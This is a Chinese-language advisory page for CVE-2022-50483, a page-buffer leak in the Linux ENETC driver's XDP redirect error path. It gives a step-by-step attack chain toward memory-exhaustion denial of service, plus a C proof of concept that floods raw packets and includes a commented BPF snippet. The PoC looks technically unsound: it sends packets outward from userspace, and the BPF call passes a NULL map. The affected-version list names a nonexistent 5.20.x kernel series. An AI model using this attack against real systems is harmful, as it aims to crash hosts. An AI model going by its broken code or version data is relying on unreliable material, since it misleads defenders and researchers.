CVE-2022-50483 Linux内核ENETC驱动XDP重定向缓冲区泄漏漏洞

漏洞信息

漏洞编号

CVE-2022-50483

漏洞类型

内存泄漏/资源管理错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核（ENETC网络驱动）

漏洞概述

CVE-2022-50483是Linux内核中ENETC（Enhanced Network Controller）网络驱动的一个缓冲区泄漏漏洞。该漏洞位于enetc_clean_rx_ring_xdp()函数中，与XDP（eXpress Data Path）的重定向操作相关。在XDP重定向失败时，由于enetc_flip_rx_buff()在半页翻转过程中将rx_swbd->page指针置空，导致错误处理路径enetc_xdp_free()无法正确释放页面引用，最终造成页面缓冲区泄漏。

该漏洞的根本原因是页面引用计数管理不当。在调用xdp_do_redirect()之前，每个软件BD（Buffer Descriptor）的页面引用计数可能为1或2。当xdp_do_redirect()返回错误时，代码调用enetc_xdp_free()，但由于rx_swbd->page已被置空，无法正确处理页面引用，导致引用计数为2的页面被泄漏。随着时间推移，系统会持续分配新页面并不断泄漏，最终可能耗尽内存资源，导致系统不稳定或拒绝服务。

该漏洞的CVSS评分为5.5，属于中危级别。攻击者需要本地低权限访问权限，无需用户交互。虽然机密性和完整性影响较低，但高可用性影响意味着系统可能因内存耗尽而变得不可用。

技术细节

漏洞的核心技术细节在于ENETC驱动中RX环描述符的页面引用计数管理。ENETC驱动使用半页（half-page）翻转技术来高效管理RX缓冲区。在正常路径中，enetc_flip_rx_buff()调用enetc_page_reusable()检查页面引用计数是否为1，如果是则将当前rx_swbd的页面指针转移到对侧的rx_swbd，并通过enetc_reuse_page()将引用计数增加到2。

问题出在以下场景：当xdp_do_redirect()触发devmap/cpumap批量队列刷新，且消费者释放了缓冲区时，页面引用计数可能变为0。然而，enetc_flip_rx_buff()在xdp_do_redirect()调用之前执行，并会在两个分支中都执行rx_swbd->page = NULL操作。当xdp_do_redirect()返回错误时，enetc_xdp_free()被调用但无法处理已被置空的页面指针。

具体泄漏路径为：1) 页面引用计数初始为1；2) enetc_flip_rx_buff()判断页面可重用，将指针转移到对侧rx_swbd，引用计数变为2；3) xdp_do_redirect()返回错误；4) 调用no-op的enetc_xdp_free()，引用计数仍为2；5) 第二次翻转时，引用计数为2的页面被判断为不可重用，导致泄漏。

修复方案是将翻转操作移至重定向成功路径，并使用enetc_xdp_drop()替代enetc_xdp_free()来回收缓冲区，避免页面泄漏。

攻击链分析

STEP 1

步骤1

攻击者获取Linux系统的本地低权限访问权限，需要能够访问ENETC网络接口（如嵌入式系统中的NXP LS1028A等）

STEP 2

步骤2

攻击者加载XDP程序或利用现有的XDP重定向路径，通过BPF程序触发xdp_do_redirect()调用

STEP 3

步骤3

通过发送特制数据包或制造网络条件，使xdp_do_redirect()返回错误，触发devmap/cpumap批量队列刷新

STEP 4

步骤4

错误处理路径调用enetc_xdp_free()，但由于rx_swbd->page已被置空，无法正确释放页面引用

STEP 5

步骤5

页面引用计数保持为2但无所有者，导致缓冲区泄漏。系统持续分配新页面，最终可能耗尽内存

STEP 6

步骤6

内存耗尽导致系统性能下降，最终触发内核panic或拒绝服务状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2022-50483 PoC - Trigger buffer leak via XDP_REDIRECT failure
// This PoC demonstrates how to trigger the buffer leak by causing
// xdp_do_redirect() to fail repeatedly

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <sys/ioctl.h>
#include <errno.h>

// Note: This vulnerability requires kernel-level access to trigger
// The actual exploitation requires:
// 1. Access to ENETC network interface
// 2. Ability to load XDP programs
// 3. Trigger conditions for xdp_do_redirect() failure

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_ll sa;
    struct ifreq ifr;
    
    // Step 1: Create raw socket for packet injection
    sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sock < 0) {
        perror("socket");
        return 1;
    }
    
    // Step 2: Get ENETC interface (typically eth0 or similar)
    strncpy(ifr.ifr_name, "eth0", IFNAMSIZ - 1);
    if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0) {
        perror("ioctl SIOCGIFINDEX");
        close(sock);
        return 1;
    }
    
    // Step 3: Bind to ENETC interface
    memset(&sa, 0, sizeof(sa));
    sa.sll_family = AF_PACKET;
    sa.sll_protocol = htons(ETH_P_ALL);
    sa.sll_ifindex = ifr.ifr_ifindex;
    
    if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(sock);
        return 1;
    }
    
    // Step 4: Send packets to trigger XDP redirect path
    // The key is to cause xdp_do_redirect() to fail
    // This can be done by:
    // - Sending malformed packets that cause redirect target issues
    // - Overwhelming the redirect queue to trigger flush failures
    // - Using BPF programs that intentionally cause redirect errors
    
    char packet[64];
    memset(packet, 0xFF, sizeof(packet));
    
    printf("Sending packets to trigger XDP redirect failure...\n");
    printf("This will cause buffer leaks in ENETC driver\n");
    
    for (int i = 0; i < 10000; i++) {
        if (send(sock, packet, sizeof(packet), 0) < 0) {
            if (errno == ENOBUFS || errno == ENETDOWN) {
                // These errors can trigger the vulnerability path
                fprintf(stderr, "Send failed (expected): %s\n", strerror(errno));
                usleep(1000);
            }
        }
        usleep(100);
    }
    
    printf("PoC completed. Check kernel memory usage for leaks.\n");
    close(sock);
    return 0;
}

// Alternative: Use BPF to trigger the vulnerability
/*
 * XDP program that causes redirect failure:
 * 
 * SEC("xdp")
 * int xdp_redirect_fail(struct xdp_md *ctx) {
 *     // Force redirect to fail by using invalid target
 *     return bpf_redirect_map(NULL, 0, 0);
 * }
 */

影响范围

Linux kernel < 5.15.85

Linux kernel 5.16.x < 5.19.7

Linux kernel 5.20.x

Linux kernel 6.0.x < 6.0.7

Linux kernel 6.1.x < 6.1.1

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以采取以下临时缓解措施：1) 禁用XDP功能，通过sysctl或内核参数限制BPF程序的加载；2) 如果系统不使用ENETC网络接口，可以通过黑名单方式禁用该驱动模块；3) 限制普通用户对网络接口的配置权限；4) 监控系统内存使用，设置内存使用阈值告警；5) 使用cgroups限制可疑进程的内存使用上限。